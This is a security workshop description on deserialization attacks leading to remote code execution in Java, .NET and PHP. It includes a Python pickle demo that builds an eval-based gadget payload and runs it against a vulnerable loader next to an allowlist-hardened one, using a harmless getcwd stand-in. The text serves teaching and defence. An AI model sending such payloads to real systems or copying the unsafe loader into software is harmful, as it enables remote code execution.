Deserialization: RCE for modern web applications


Deserialization is the process of converting a data stream back into an object instance. At the end of 2015, the Java community was taken by storm by deserialization vulnerabilities that abused a gadget chain in the Apache Commons Collections library. The event highlighted how many applications deserialized untrusted data: at the time, Jenkins, WebLogic, WebSphere and JBoss all used the same vulnerable code pattern. Two years later, researchers turned to the .NET ecosystem and discovered that many of its serialization libraries were vulnerable to similar attacks. In 2018, vulnerabilities were found notably in SharePoint (Workflows API), phpBB (using a new PHP vector) and many more. Hundreds of CVEs were recorded that year, proving that deserialization is still an active threat for modern web applications. Developers and pentesters can't ignore this risk because, in most cases, it leads to remote code execution.

This 3-hour workshop will go through the basics of exploiting such vulnerabilities in multiple languages, including Java, .NET and PHP. After the theory, participants will have access to vulnerable applications specially designed for the workshop. Their objective will be to exploit these applications using the presented methods; step-by-step instructions and tools will be provided. Additionally, dedicated exercises will give participants the knowledge and skills to build gadget chains of their own.
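The code pattern described above, as an added example that is not part of the workshop material or of any of the products named: Python's pickle is used here as a stand-in for Java's ObjectInputStream, the .NET formatters and PHP's unserialize(), because the mechanism is the same in all of them. A "gadget" is a type that already exists on the victim and does something dangerous when its deserialization hook runs; here the hook is __reduce__ and the sink is builtins.eval, where a Java chain would end in a readObject() sequence such as the Commons Collections one. The names SessionState, Gadget, build_payload, vulnerable_loads and safe_loads are made up for this example, and os.getcwd() stands in for os.system() so the demo has no side effects. The allowlist-based RestrictedUnpickler follows the "Restricting Globals" pattern from the Python standard library documentation.

```python
"""Deserialization to code execution with Python's pickle (constructed demo).

Everything below is made up for illustration: SessionState, Gadget,
build_payload, vulnerable_loads and safe_loads are not part of any library
or of the workshop. os.getcwd() stands in for os.system("...") so that the
demo has no side effects; the mechanism is exactly the same.
"""
import io
import os
import pickle


class SessionState:
    """A harmless type the application legitimately serialises."""

    def __init__(self, user, roles):
        self.user = user
        self.roles = roles


# ---- attacker side ----------------------------------------------------------

class Gadget:
    """Attacker-side helper whose only job is to emit a pickle stream that,
    when read, calls builtins.eval on attacker-chosen source.

    The victim never needs this class: the stream only references
    builtins.eval, which exists in every Python process, just as a Java
    gadget chain only references classes already on the target's classpath.
    """

    def __init__(self, source):
        self.source = source

    def __reduce__(self):
        # Instead of the object's state, pickle records "call eval(source)".
        return (eval, (self.source,))


def build_payload(source="__import__('os').getcwd()"):
    """Serialise the gadget into the bytes an attacker would send."""
    return pickle.dumps(Gadget(source))


# ---- victim side ------------------------------------------------------------

def vulnerable_loads(data):
    """The unsafe pattern: deserialise whatever the client sent."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened pattern: resolve only an explicit allowlist of globals.

    Every class or function named in the stream goes through find_class,
    so a closed list here is what stops gadgets nobody has heard of yet.
    """

    ALLOWED = {(SessionState.__module__, "SessionState")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    """Feed the same payload to both loaders and report what happened."""
    payload = build_payload()
    assert b"Gadget" not in payload       # the attacker's class is not in the stream
    executed = vulnerable_loads(payload)  # eval() has now run inside this process
    try:
        safe_loads(payload)
        refused = False
    except pickle.UnpicklingError:
        refused = True
    # The legitimate object still round-trips through the hardened loader.
    legit = safe_loads(pickle.dumps(SessionState("alice", ["user"])))
    return {
        "attacker_code_ran": executed == os.getcwd(),
        "restricted_loader_refused": refused,
        "legit_user": legit.user,
    }


if __name__ == "__main__":
    print(demo())
```

Running the script shows the vulnerable loader returning the result of code the attacker chose, while the restricted loader rejects the same bytes and still accepts the application's own type. The detail worth noticing is that the payload never contains the Gadget class: the attacker only needs something already present in the victim's runtime, which is why deny-listing the gadgets known today is not a fix.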

Participants should bring:
  • Laptop
  • Java, .NET and Python installed (or a Docker image with those)
  • An HTTP proxy such as ZAP or Burp Suite
Required skill level: Intermediate

Beginners will be able to do the first part of the workshop (exploitation with ysoserial) but will have a hard time with the custom gadget exercise.